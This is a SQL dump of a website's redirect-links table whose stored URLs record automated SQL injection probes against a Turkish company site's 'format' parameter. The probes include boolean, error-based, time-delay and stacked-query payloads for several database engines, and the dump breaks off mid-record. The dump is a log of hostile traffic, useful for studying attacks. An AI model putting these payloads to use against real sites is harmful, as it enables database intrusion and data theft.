INSERT INTO `fz6t4_redirect_links` VALUES (35018,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	1972/**/in	(select	(char(113)+char(113)+char(98)+char(98)+char(113)+(select	(case	when	(1972/**/like	1972)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(113)+char(112)+char(113)))/**/and	\'kiep\'/**/like	\'kiep',NULL,'','',1,0,'2024-06-15 08:04:35','0000-00-00 00:00:00',301),(35019,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	1972/**/in	(select	(char(113)+char(113)+char(98)+char(98)+char(113)+(select	(case	when	(1972/**/like	1972)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(113)+char(112)+char(113)))/**/and	(8911/**/between	8911/**/and	8911',NULL,'','',1,0,'2024-06-15 08:04:37','0000-00-00 00:00:00',301),(35020,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	1972/**/in	(select	(char(113)+char(113)+char(98)+char(98)+char(113)+(select	(case	when	(1972/**/between	1972)/**/and	1972)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(113)+char(112)+char(113)))',NULL,'','',1,0,'2024-06-15 08:04:38','0000-00-00 00:00:00',301),(35021,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	1972/**/in	(select	(char(113)+char(113)+char(98)+char(98)+char(113)+(select	(case	when	(1972/**/between	1972)/**/and	1972)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(113)+char(112)+char(113)))--/**/optt',NULL,'','',1,0,'2024-06-15 08:04:39','0000-00-00 00:00:00',301),(35022,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	5857/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(98)||chr(98)||chr(113)||(select	(case	when	(5857/**/like	5857)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(113)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	(\'ohch\'/**/like	\'ohch',NULL,'','',1,0,'2024-06-15 08:04:41','0000-00-00 00:00:00',301),(35023,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	5857/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(98)||chr(98)||chr(113)||(select	(case	when	(5857/**/like	5857)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(113)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	\'psup\'/**/like	\'psup',NULL,'','',1,0,'2024-06-15 08:04:42','0000-00-00 00:00:00',301),(35024,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	5857/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(98)||chr(98)||chr(113)||(select	(case	when	(5857/**/like	5857)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(113)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	(9210/**/between	9210/**/and	9210',NULL,'','',1,0,'2024-06-15 08:04:43','0000-00-00 00:00:00',301),(35025,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	5857/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(98)||chr(98)||chr(113)||(select	(case	when	(5857/**/like	5857)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(113)||chr(112)||chr(113)||chr(62)))/**/from	dual	)',NULL,'','',1,0,'2024-06-15 08:04:45','0000-00-00 00:00:00',301),(35026,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	5857/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(98)||chr(98)||chr(113)||(select	(case	when	(5857/**/like	5857)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(113)||chr(112)||chr(113)||chr(62)))/**/from	dual	)--/**/ciwy',NULL,'','',1,0,'2024-06-15 08:04:46','0000-00-00 00:00:00',301),(35027,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=(select	concat(concat(\'qqbbq\',(case	when	(9073/**/like	9073)/**/then	\'1\'/**/else	\'0\'/**/end	)),\'qjqpq\'))',NULL,'','',1,0,'2024-06-15 08:04:47','0000-00-00 00:00:00',301),(35028,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\');select	pg_sleep(5)--',NULL,'','',1,0,'2024-06-15 08:04:49','0000-00-00 00:00:00',301),(35029,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\';select	pg_sleep(5)--',NULL,'','',1,0,'2024-06-15 08:04:50','0000-00-00 00:00:00',301),(35030,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch);select	pg_sleep(5)--',NULL,'','',1,0,'2024-06-15 08:04:51','0000-00-00 00:00:00',301),(35031,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch;select	pg_sleep(5)--',NULL,'','',1,0,'2024-06-15 08:04:53','0000-00-00 00:00:00',301),(35032,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\');waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',1,0,'2024-06-15 08:04:54','0000-00-00 00:00:00',301),(35033,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\';waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',1,0,'2024-06-15 08:04:55','0000-00-00 00:00:00',301),(35034,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch);waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',1,0,'2024-06-15 08:04:57','0000-00-00 00:00:00',301),(35035,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch;waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',1,0,'2024-06-15 08:04:58','0000-00-00 00:00:00',301),(35036,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\');select	dbms_pipe.receive_message(chr(101)||chr(76)||chr(107)||chr(113),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 08:04:59','0000-00-00 00:00:00',301),(35037,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\';select	dbms_pipe.receive_message(chr(101)||chr(76)||chr(107)||chr(113),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 08:05:01','0000-00-00 00:00:00',301),(35038,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch);select	dbms_pipe.receive_message(chr(101)||chr(76)||chr(107)||chr(113),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 08:05:02','0000-00-00 00:00:00',301),(35039,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch;select	dbms_pipe.receive_message(chr(101)||chr(76)||chr(107)||chr(113),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 08:05:04','0000-00-00 00:00:00',301),(35040,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	(select	2207/**/from	(select(sleep(5)))ncpn)/**/and	(\'qtef\'/**/like	\'qtef',NULL,'','',1,0,'2024-06-15 08:05:06','0000-00-00 00:00:00',301),(35041,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	(select	2207/**/from	(select(sleep(5)))ncpn)/**/and	\'opso\'/**/like	\'opso',NULL,'','',1,0,'2024-06-15 08:05:07','0000-00-00 00:00:00',301),(35042,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	(select	2207/**/from	(select(sleep(5)))ncpn)/**/and	(9938/**/between	9938/**/and	9938',NULL,'','',1,0,'2024-06-15 08:05:09','0000-00-00 00:00:00',301),(35043,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	(select	2207/**/from	(select(sleep(5)))ncpn)',NULL,'','',1,0,'2024-06-15 08:05:10','0000-00-00 00:00:00',301),(35044,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	(select	2207/**/from	(select(sleep(5)))ncpn)--/**/jfha',NULL,'','',1,0,'2024-06-15 08:05:12','0000-00-00 00:00:00',301),(35045,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	4910/**/like	(select	4910/**/from	pg_sleep(5))/**/and	(\'ilkg\'/**/like	\'ilkg',NULL,'','',1,0,'2024-06-15 08:05:13','0000-00-00 00:00:00',301),(35046,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	4910/**/like	(select	4910/**/from	pg_sleep(5))/**/and	\'fspc\'/**/like	\'fspc',NULL,'','',1,0,'2024-06-15 08:05:15','0000-00-00 00:00:00',301),(35047,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	4910/**/like	(select	4910/**/from	pg_sleep(5))/**/and	(2936/**/between	2936/**/and	2936',NULL,'','',1,0,'2024-06-15 08:05:16','0000-00-00 00:00:00',301),(35048,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	4910/**/between	(select	and	(select4910/**/from	pg_sleep(5))',NULL,'','',1,0,'2024-06-15 08:05:17','0000-00-00 00:00:00',301),(35049,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	4910/**/between	(select	and	(select4910/**/from	pg_sleep(5))--/**/xbak',NULL,'','',1,0,'2024-06-15 08:05:19','0000-00-00 00:00:00',301),(35050,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(\'hxds\'/**/like	\'hxds',NULL,'','',1,0,'2024-06-15 08:05:20','0000-00-00 00:00:00',301),(35051,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/waitfor/**/delay/**/\'0:0:5\'/**/and	\'smqw\'/**/like	\'smqw',NULL,'','',1,0,'2024-06-15 08:05:21','0000-00-00 00:00:00',301),(35052,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(2639/**/between	2639/**/and	2639',NULL,'','',1,0,'2024-06-15 08:05:23','0000-00-00 00:00:00',301),(35053,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/waitfor/**/delay/**/\'0:0:5\'',NULL,'','',1,0,'2024-06-15 08:05:24','0000-00-00 00:00:00',301),(35054,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/waitfor/**/delay/**/\'0:0:5\'--/**/opek',NULL,'','',1,0,'2024-06-15 08:05:25','0000-00-00 00:00:00',301),(35055,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	2278/**/like	dbms_pipe.receive_message(chr(117)||chr(70)||chr(81)||chr(78),5)/**/and	(\'binb\'/**/like	\'binb',NULL,'','',1,0,'2024-06-15 08:05:27','0000-00-00 00:00:00',301),(35056,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	2278/**/like	dbms_pipe.receive_message(chr(117)||chr(70)||chr(81)||chr(78),5)/**/and	\'yjls\'/**/like	\'yjls',NULL,'','',1,0,'2024-06-15 08:05:28','0000-00-00 00:00:00',301),(35057,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	2278/**/like	dbms_pipe.receive_message(chr(117)||chr(70)||chr(81)||chr(78),5)/**/and	(9936/**/between	9936/**/and	9936',NULL,'','',1,0,'2024-06-15 08:05:29','0000-00-00 00:00:00',301),(35058,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	2278/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(117)||chr(70)||chr(81)||chr(78),5)',NULL,'','',1,0,'2024-06-15 08:05:31','0000-00-00 00:00:00',301),(35059,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	2278/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(117)||chr(70)||chr(81)||chr(78),5)--/**/tbsw',NULL,'','',1,0,'2024-06-15 08:05:32','0000-00-00 00:00:00',301),(35060,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/order	by	1--/**/udll',NULL,'','',1,0,'2024-06-15 08:05:33','0000-00-00 00:00:00',301),(35061,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/order	by	1--/**/cbum',NULL,'','',1,0,'2024-06-15 08:05:35','0000-00-00 00:00:00',301),(35062,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/order	by	1--/**/ezgs',NULL,'','',1,0,'2024-06-15 08:05:36','0000-00-00 00:00:00',301),(35063,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/order	by	1--/**/ohdp',NULL,'','',1,0,'2024-06-15 08:05:37','0000-00-00 00:00:00',301),(35064,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/order	by	1--/**/fktv',NULL,'','',1,0,'2024-06-15 08:05:39','0000-00-00 00:00:00',301),(35065,'https://www.3s-technologies.com.tr/en/?format=4309&type=rss',NULL,'','',1,0,'2024-06-15 16:05:29','0000-00-00 00:00:00',301),(35066,'https://www.3s-technologies.com.tr/en/?format=feed\'cowluc<\'\">xiwbzx&type=rss',NULL,'','',1,0,'2024-06-15 16:05:33','0000-00-00 00:00:00',301),(35067,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	4267/**/like	4938/**/and	(\'uedw\'/**/like	\'uedw&type=rss',NULL,'','',1,0,'2024-06-15 16:05:36','0000-00-00 00:00:00',301),(35068,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	2061/**/like	2061/**/and	(\'fqtm\'/**/like	\'fqtm&type=rss',NULL,'','',1,0,'2024-06-15 16:05:37','0000-00-00 00:00:00',301),(35069,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	5853/**/like	6516/**/and	\'jbnf\'/**/like	\'jbnf&type=rss',NULL,'','',1,0,'2024-06-15 16:05:38','0000-00-00 00:00:00',301),(35070,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	2061/**/like	2061/**/and	\'mwpm\'/**/like	\'mwpm&type=rss',NULL,'','',1,0,'2024-06-15 16:05:40','0000-00-00 00:00:00',301),(35071,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	5560/**/like	2050/**/and	(8646/**/between	8646/**/and	8646&type=rss',NULL,'','',1,0,'2024-06-15 16:05:41','0000-00-00 00:00:00',301),(35072,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	2061/**/like	2061/**/and	(8524/**/between	8524/**/and	8524&type=rss',NULL,'','',1,0,'2024-06-15 16:05:43','0000-00-00 00:00:00',301),(35073,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	1656/**/between	6773/**/and	6773&type=rss',NULL,'','',1,0,'2024-06-15 16:05:44','0000-00-00 00:00:00',301),(35074,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	2061/**/between	2061/**/and	2061&type=rss',NULL,'','',1,0,'2024-06-15 16:05:45','0000-00-00 00:00:00',301),(35075,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	9612/**/between	6398/**/and	6398--/**/oxgl&type=rss',NULL,'','',1,0,'2024-06-15 16:05:47','0000-00-00 00:00:00',301),(35076,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	2061/**/between	2061/**/and	2061--/**/yehi&type=rss',NULL,'','',1,0,'2024-06-15 16:05:48','0000-00-00 00:00:00',301),(35077,'https://www.3s-technologies.com.tr/en/?format=(select	(case	when	(9371/**/like	1306)/**/then	\'feed\'/**/else	(select	1306/**/union	select	2089)/**/end	))&type=rss',NULL,'','',1,0,'2024-06-15 16:05:50','0000-00-00 00:00:00',301),(35078,'https://www.3s-technologies.com.tr/en/?format=(select	(case	when	(6083/**/like	6083)/**/then	\'feed\'/**/else	(select	9724/**/union	select	7645)/**/end	))&type=rss',NULL,'','',1,0,'2024-06-15 16:05:51','0000-00-00 00:00:00',301),(35079,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	extractvalue(3444,concat(0x5c,0x7178717a71,(select	(elt(3444/**/like	3444,1))),0x71787a7871))/**/and	(\'qyaj\'/**/like	\'qyaj&type=rss',NULL,'','',1,0,'2024-06-15 16:05:52','0000-00-00 00:00:00',301),(35080,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	extractvalue(3444,concat(0x5c,0x7178717a71,(select	(elt(3444/**/like	3444,1))),0x71787a7871))/**/and	\'zksc\'/**/like	\'zksc&type=rss',NULL,'','',1,0,'2024-06-15 16:05:54','0000-00-00 00:00:00',301),(35081,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	extractvalue(3444,concat(0x5c,0x7178717a71,(select	(elt(3444/**/like	3444,1))),0x71787a7871))/**/and	(7074/**/between	7074/**/and	7074&type=rss',NULL,'','',1,0,'2024-06-15 16:05:55','0000-00-00 00:00:00',301),(35082,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	extractvalue(3444,concat(0x5c,0x7178717a71,(select	(elt(3444/**/between	3444/**/and	3444,1))),0x71787a7871))&type=rss',NULL,'','',1,0,'2024-06-15 16:05:57','0000-00-00 00:00:00',301),(35083,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	extractvalue(3444,concat(0x5c,0x7178717a71,(select	(elt(3444/**/between	3444/**/and	3444,1))),0x71787a7871))--/**/uljn&type=rss',NULL,'','',1,0,'2024-06-15 16:05:59','0000-00-00 00:00:00',301),(35084,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	7966/**/like	cast((chr(113)||chr(120)||chr(113)||chr(122)||chr(113))||(select	(case	when	(7966/**/like	7966)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(120)||chr(122)||chr(120)||chr(113))/**/as	numeric	)/**/and	(\'zjlk\'/**/like	\'zjlk&type=rss',NULL,'','',1,0,'2024-06-15 16:06:01','0000-00-00 00:00:00',301),(35085,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	7966/**/like	cast((chr(113)||chr(120)||chr(113)||chr(122)||chr(113))||(select	(case	when	(7966/**/like	7966)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(120)||chr(122)||chr(120)||chr(113))/**/as	numeric	)/**/and	\'cewg\'/**/like	\'cewg&type=rss',NULL,'','',1,0,'2024-06-15 16:06:02','0000-00-00 00:00:00',301),(35086,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	7966/**/like	cast((chr(113)||chr(120)||chr(113)||chr(122)||chr(113))||(select	(case	when	(7966/**/like	7966)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(120)||chr(122)||chr(120)||chr(113))/**/as	numeric	)/**/and	(7053/**/between	7053/**/and	7053&type=rss',NULL,'','',1,0,'2024-06-15 16:06:03','0000-00-00 00:00:00',301),(35087,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7966/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(120)||chr(113)||chr(122)||chr(113))||(select	(case	when	(7966/**/like	7966)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(120)||chr(122)||chr(120)||chr(113))/**/as	numeric	)&type=rss',NULL,'','',1,0,'2024-06-15 16:06:05','0000-00-00 00:00:00',301),(35088,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7966/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(120)||chr(113)||chr(122)||chr(113))||(select	(case	when	(7966/**/like	7966)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(120)||chr(122)||chr(120)||chr(113))/**/as	numeric	)--/**/pmnx&type=rss',NULL,'','',1,0,'2024-06-15 16:06:06','0000-00-00 00:00:00',301),(35089,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	7192/**/in	(select	(char(113)+char(120)+char(113)+char(122)+char(113)+(select	(case	when	(7192/**/like	7192)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(120)+char(122)+char(120)+char(113)))/**/and	(\'lfwa\'/**/like	\'lfwa&type=rss',NULL,'','',1,0,'2024-06-15 16:06:08','0000-00-00 00:00:00',301),(35090,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	7192/**/in	(select	(char(113)+char(120)+char(113)+char(122)+char(113)+(select	(case	when	(7192/**/like	7192)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(120)+char(122)+char(120)+char(113)))/**/and	\'lrbr\'/**/like	\'lrbr&type=rss',NULL,'','',1,0,'2024-06-15 16:06:10','0000-00-00 00:00:00',301),(35091,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	7192/**/in	(select	(char(113)+char(120)+char(113)+char(122)+char(113)+(select	(case	when	(7192/**/like	7192)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(120)+char(122)+char(120)+char(113)))/**/and	(8268/**/between	8268/**/and	8268&type=rss',NULL,'','',1,0,'2024-06-15 16:06:12','0000-00-00 00:00:00',301),(35092,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7192/**/in	(select	(char(113)+char(120)+char(113)+char(122)+char(113)+(select	(case	when	(7192/**/between	7192)/**/and	7192)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(120)+char(122)+char(120)+char(113)))&type=rss',NULL,'','',1,0,'2024-06-15 16:06:13','0000-00-00 00:00:00',301),(35093,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7192/**/in	(select	(char(113)+char(120)+char(113)+char(122)+char(113)+(select	(case	when	(7192/**/between	7192)/**/and	7192)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(120)+char(122)+char(120)+char(113)))--/**/dpyv&type=rss',NULL,'','',1,0,'2024-06-15 16:06:15','0000-00-00 00:00:00',301),(35094,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	6072/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(113)||chr(122)||chr(113)||(select	(case	when	(6072/**/like	6072)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(120)||chr(122)||chr(120)||chr(113)||chr(62)))/**/from	dual	)/**/and	(\'cjdg\'/**/like	\'cjdg&type=rss',NULL,'','',1,0,'2024-06-15 16:06:17','0000-00-00 00:00:00',301),(35095,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	6072/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(113)||chr(122)||chr(113)||(select	(case	when	(6072/**/like	6072)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(120)||chr(122)||chr(120)||chr(113)||chr(62)))/**/from	dual	)/**/and	\'ypja\'/**/like	\'ypja&type=rss',NULL,'','',1,0,'2024-06-15 16:06:19','0000-00-00 00:00:00',301),(35096,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	6072/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(113)||chr(122)||chr(113)||(select	(case	when	(6072/**/like	6072)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(120)||chr(122)||chr(120)||chr(113)||chr(62)))/**/from	dual	)/**/and	(8623/**/between	8623/**/and	8623&type=rss',NULL,'','',1,0,'2024-06-15 16:06:20','0000-00-00 00:00:00',301),(35097,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	6072/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(113)||chr(122)||chr(113)||(select	(case	when	(6072/**/like	6072)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(120)||chr(122)||chr(120)||chr(113)||chr(62)))/**/from	dual	)&type=rss',NULL,'','',1,0,'2024-06-15 16:06:21','0000-00-00 00:00:00',301),(35098,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	6072/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(113)||chr(122)||chr(113)||(select	(case	when	(6072/**/like	6072)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(120)||chr(122)||chr(120)||chr(113)||chr(62)))/**/from	dual	)--/**/uzcc&type=rss',NULL,'','',1,0,'2024-06-15 16:06:24','0000-00-00 00:00:00',301),(35099,'https://www.3s-technologies.com.tr/en/?format=(select	concat(concat(\'qxqzq\',(case	when	(4713/**/like	4713)/**/then	\'1\'/**/else	\'0\'/**/end	)),\'qxzxq\'))&type=rss',NULL,'','',1,0,'2024-06-15 16:06:26','0000-00-00 00:00:00',301),(35100,'https://www.3s-technologies.com.tr/en/?format=feed\');select	pg_sleep(5)--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:27','0000-00-00 00:00:00',301),(35101,'https://www.3s-technologies.com.tr/en/?format=feed\';select	pg_sleep(5)--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:28','0000-00-00 00:00:00',301),(35102,'https://www.3s-technologies.com.tr/en/?format=feed);select	pg_sleep(5)--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:30','0000-00-00 00:00:00',301),(35103,'https://www.3s-technologies.com.tr/en/?format=feed;select	pg_sleep(5)--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:31','0000-00-00 00:00:00',301),(35104,'https://www.3s-technologies.com.tr/en/?format=feed\');waitfor/**/delay/**/\'0:0:5\'--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:32','0000-00-00 00:00:00',301),(35105,'https://www.3s-technologies.com.tr/en/?format=feed\';waitfor/**/delay/**/\'0:0:5\'--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:34','0000-00-00 00:00:00',301),(35106,'https://www.3s-technologies.com.tr/en/?format=feed);waitfor/**/delay/**/\'0:0:5\'--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:35','0000-00-00 00:00:00',301),(35107,'https://www.3s-technologies.com.tr/en/?format=feed;waitfor/**/delay/**/\'0:0:5\'--&type=rss',NULL,'','',2,0,'2024-06-15 16:06:36','0000-00-00 00:00:00',301),(35108,'https://www.3s-technologies.com.tr/en/?format=feed\');select	dbms_pipe.receive_message(chr(90)||chr(122)||chr(76)||chr(122),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-15 16:06:38','0000-00-00 00:00:00',301),(35109,'https://www.3s-technologies.com.tr/en/?format=feed\';select	dbms_pipe.receive_message(chr(90)||chr(122)||chr(76)||chr(122),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-15 16:06:39','0000-00-00 00:00:00',301),(35110,'https://www.3s-technologies.com.tr/en/?format=feed);select	dbms_pipe.receive_message(chr(90)||chr(122)||chr(76)||chr(122),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-15 16:06:40','0000-00-00 00:00:00',301),(35111,'https://www.3s-technologies.com.tr/en/?format=feed;select	dbms_pipe.receive_message(chr(90)||chr(122)||chr(76)||chr(122),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-15 16:06:42','0000-00-00 00:00:00',301),(35112,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	(select	5567/**/from	(select(sleep(5)))lkps)/**/and	(\'htyg\'/**/like	\'htyg&type=rss',NULL,'','',1,0,'2024-06-15 16:06:43','0000-00-00 00:00:00',301),(35113,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	(select	5567/**/from	(select(sleep(5)))lkps)/**/and	\'nytw\'/**/like	\'nytw&type=rss',NULL,'','',1,0,'2024-06-15 16:06:45','0000-00-00 00:00:00',301),(35114,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	(select	5567/**/from	(select(sleep(5)))lkps)/**/and	(7611/**/between	7611/**/and	7611&type=rss',NULL,'','',1,0,'2024-06-15 16:06:46','0000-00-00 00:00:00',301),(35115,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	(select	5567/**/from	(select(sleep(5)))lkps)&type=rss',NULL,'','',1,0,'2024-06-15 16:06:47','0000-00-00 00:00:00',301),(35116,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	(select	5567/**/from	(select(sleep(5)))lkps)--/**/siyb&type=rss',NULL,'','',1,0,'2024-06-15 16:06:49','0000-00-00 00:00:00',301),(35117,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	3950/**/like	(select	3950/**/from	pg_sleep(5))/**/and	(\'nsqj\'/**/like	\'nsqj&type=rss',NULL,'','',1,0,'2024-06-15 16:06:50','0000-00-00 00:00:00',301),(35118,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	3950/**/like	(select	3950/**/from	pg_sleep(5))/**/and	\'usxq\'/**/like	\'usxq&type=rss',NULL,'','',1,0,'2024-06-15 16:06:51','0000-00-00 00:00:00',301),(35119,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	3950/**/like	(select	3950/**/from	pg_sleep(5))/**/and	(1341/**/between	1341/**/and	1341&type=rss',NULL,'','',1,0,'2024-06-15 16:06:52','0000-00-00 00:00:00',301),(35120,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	3950/**/between	(select	and	(select3950/**/from	pg_sleep(5))&type=rss',NULL,'','',1,0,'2024-06-15 16:06:54','0000-00-00 00:00:00',301),(35121,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	3950/**/between	(select	and	(select3950/**/from	pg_sleep(5))--/**/oioi&type=rss',NULL,'','',1,0,'2024-06-15 16:06:55','0000-00-00 00:00:00',301),(35122,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(\'czrw\'/**/like	